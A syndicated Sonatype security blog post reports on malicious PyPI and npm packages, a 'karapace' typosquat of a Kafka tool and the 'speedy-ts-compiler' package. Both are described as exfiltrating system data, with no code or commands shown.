Security Bloggers Network Vulnerabilities 
SBN

This Week in Malware—Apache Kafka typosquats, shorthand data exfiltration

by Ax Sharma on May 6, 2022

This Week In Malware we pull apart a typosquat impersonating an Apache Kafka project and an interesting npm package that downloads another empty npm package—but turns out that’s merely a distraction technique.

We further review dependency confusion packages caught this week by Sonatype’s automated malware detection bots, offered as a part of the next-generation Nexus platform.

1. Apache Kafka copycat: ‘karapace’

Assigned sonatype-2022-2696 in our security research data, first off, we have a PyPI package, ‘karapace‘ analyzed by our senior security researcher Ankita Lamba.

The ‘karapace’ package has an exact name as the karapace Python package on GitHub which is “An open-source implementation of Kafka REST and Schema Registry.”

In the developer’s words, ‘karapace’ offers “Your Apache Kafka® essentials in one tool.” And the user squatting the same name on PyPI did not miss an opportunity to reuse the slogan:

But within the ‘karapace’ published to PyPI we see code that exfiltrates your IP address, environment variables, username, and other system fingerprinting information to a Pipedream address:

Considering the code contained within the package closely resembles several dependency confusion attacks we have seen thus far, this appears to be a PoC research package.

Out of caution, however, Sonatype reported the package to the PyPI security team and the package was taken down.

2. Exfiltration by distraction: npm package that downloads another empty package

On any given day, Sonatype’s security research team analyzes dozens to hundreds of suspicious packages published to open source registries including npm and PyPI.

But, this one—”speedy-ts-compiler” stood out to us. It is named after a hypothetical package used as an example within TypeStrong’s official docs and READMEs.

TypeScript Node

But, the “speedy-ts-compiler” caught by us downloads an empty npm package, “tastytreats” while simultaneously exfiltrating your IP address and username using the ‘npm get cache’ (Read more...)

*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Ax Sharma. Read the original post at: https://blog.sonatype.com/this-week-in-malware-apache-kafka-typosquats-shorthand-data-exfiltration

Ax Sharma , , , ,